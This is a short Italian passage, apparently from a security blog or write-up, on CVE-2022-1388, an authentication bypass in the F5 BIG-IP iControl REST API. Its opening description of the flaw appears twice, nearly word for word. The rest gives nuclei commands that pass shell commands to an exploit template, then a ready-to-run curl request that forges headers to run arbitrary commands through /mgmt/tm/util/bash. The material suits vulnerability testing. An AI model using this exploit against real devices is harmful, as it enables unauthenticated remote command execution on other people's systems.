
CVE-2022-1388 è una vulnerabilità di bypass dell'autenticazione nel componente REST dell'API iControl di BIG-IP a cui è stato assegnato un punteggio CVSSv3 di 9.8. L'API REST iControl viene utilizzata per la gestione e la configurazione dei dispositivi BIG-IP. CVE-2022-1388 potrebbe essere sfruttata da un attaccante non autenticato con accesso di rete alla porta di gestione o agli indirizzi IP propri dei dispositivi che utilizzano BIG-IP. Lo sfruttamento consentirebbe all'attaccante di eseguire comandi arbitrari del sistema, creare e cancellare file e disabilitare servizi.
CVE-2022-1388 è una vulnerabilità di bypass dell'autenticazione nel componente REST dell'API iControl di BIG-IP a cui è stato assegnato un punteggio CVSSv3 di 9.8. L'API REST iControl è utilizzata per la gestione e la configurazione dei dispositivi BIG-IP. CVE-2022-1388 potrebbe essere sfruttata da un attaccante non autenticato con accesso di rete alla porta di gestione o agli indirizzi IP self dei dispositivi che utilizzano BIG-IP. Lo sfruttamento consentirebbe all'attaccante di eseguire comandi di sistema arbitrari, creare ed eliminare file e disabilitare servizi.
Questo nuclei-template accetta parametri shell per lo sfruttamento. Volevamo testare token ottenuti da un altro workflow o da una ricerca manuale, quindi abbiamo utilizzato la funzionalità di variabile CLI di nuclei per alimentare dinamicamente un singolo valore di token o una lista di token in questi template al momento dell'esecuzione
-V, -var value variabili personalizzate in formato var=valore
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'